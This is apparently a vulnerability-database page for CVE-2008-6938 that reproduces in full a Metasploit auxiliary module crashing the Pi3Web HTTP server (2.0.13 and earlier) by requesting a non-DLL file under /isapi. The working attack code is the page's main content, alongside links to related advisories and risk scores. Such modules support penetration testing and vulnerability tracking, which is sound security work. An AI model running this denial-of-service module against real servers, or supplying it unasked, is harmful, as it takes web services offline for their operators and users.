Lucene search
K

Pi3Web ISAPI DoS

🗓️ 16 Nov 2008 04:35:47Reported by kris katterjohn <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 13 Views

Pi3Web ISAPI DoS. HTTP server crashes on request for invalid DLL file in /isapi for versions 2.0.13 and earlie

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-6938
13 Nov 200800:00
circl
CVE
CVE-2008-6938
11 Aug 200920:25
cve
Cvelist
CVE-2008-6938
11 Aug 200920:25
cvelist
NVD
CVE-2008-6938
11 Aug 200921:00
nvd
OpenVAS
Pi3Web ISAPI Requests Handling DoS Vulnerability
2 Dec 200800:00
openvas
Packet Storm
Pi3Web ISAPI Denial of Service
31 Aug 202400:00
packetstorm
Prion
Server side request forgery (ssrf)
11 Aug 200921:00
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Pi3Web ISAPI DoS',
      'Description'    => %q{
        The Pi3Web HTTP server crashes when a request is made for an invalid DLL
        file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs
        in this directory after installation are users.txt, install.daf and
        readme.daf.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2008-6938'],
        [ 'OSVDB', '49998'],
        [ 'EDB', '7109' ]
      ],
      'DisclosureDate' => '2008-11-13'))

    register_options([
      OptString.new('FILENAME', [ true, 'File in /isapi to request', 'users.txt' ])
    ])
  end

  def run
    begin
      o = { 'uri' => "/isapi/#{datastore['FILENAME']}" }

      c = connect(o)
      c.send_request(c.request_raw(o))

      print_status("Request sent to #{rhost}:#{rport}")
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Couldn't connect to #{rhost}:#{rport}")
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7High risk
Vulners AI Score7
CVSS 24.3
EPSS0.73687
13